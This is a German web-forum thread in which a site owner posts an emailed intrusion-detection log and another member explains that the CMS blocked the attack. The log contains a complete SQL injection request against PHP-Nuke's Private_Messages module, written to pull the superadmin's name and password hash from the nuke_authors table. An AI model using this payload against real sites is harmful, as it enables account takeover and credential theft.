Hackangriff

smartmusic · 14 Juli 2005, 21:50:54

sorry,aber was ist das,habe es als email bekommen...

drück mal unten auf den langen link...cyber warrior

? hat sich nun jemand in das system eingehackt?

--------------------------------------------------
14-07-2005 21:34:33 [Union] Hack detected (0)
user: Gast
admin: Gast
request:
_GET[name] = Private_Messages
_GET[file] = index
_GET[folder] = savebox
_GET[mode] = read
_GET[p] = 99
_GET[pm_sql_user] = AND pm.privmsgs_type=-99 UNION SELECT aid,null,pwd,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM nuke_authors WHERE radminsuper=1 LIMIT 1/*
_GET[pm_sql_user (encoded)] = Ğş¦jkSù¬,Ër¥
Serverinfo:
REMOTE_ADDR: 62.40.174.44
QUERY_STRING: name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*
REQUEST_URI: /modules.php?name=Private_Messages&file=index&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20aid,null,pwd,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20nuke_authors%20WHERE%20radminsuper=1%20LIMIT%201/*
REMOTE_PORT: 61279
REMOTE_HOST:
HTTP_REFERER: http://www.xxxxx.xx/3/phpnukehack.php?target=http%3A%2F%2Fwww.xxxxxxx.de&admin=hack&sifre=hack&Submit=Sitedeki+a%E7iklara+bak
HTTP_USER_AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 3.1)
HTTP_X_FORWARDED_FOR:

Andi · 14 Juli 2005, 21:56:11

Hi

nein, keine Sorge.
Das ist ein Angriff, der vom System erkannt wurde.
Die Seite im referer ist eine der Nuke-Standardhackerseiten. Mit den Dingern dort kann man dem vkpMx/pragmaMx nix anhaben...

ps.
habe trotzdem den Link geändert.

Hackangriff

smartmusic

Andi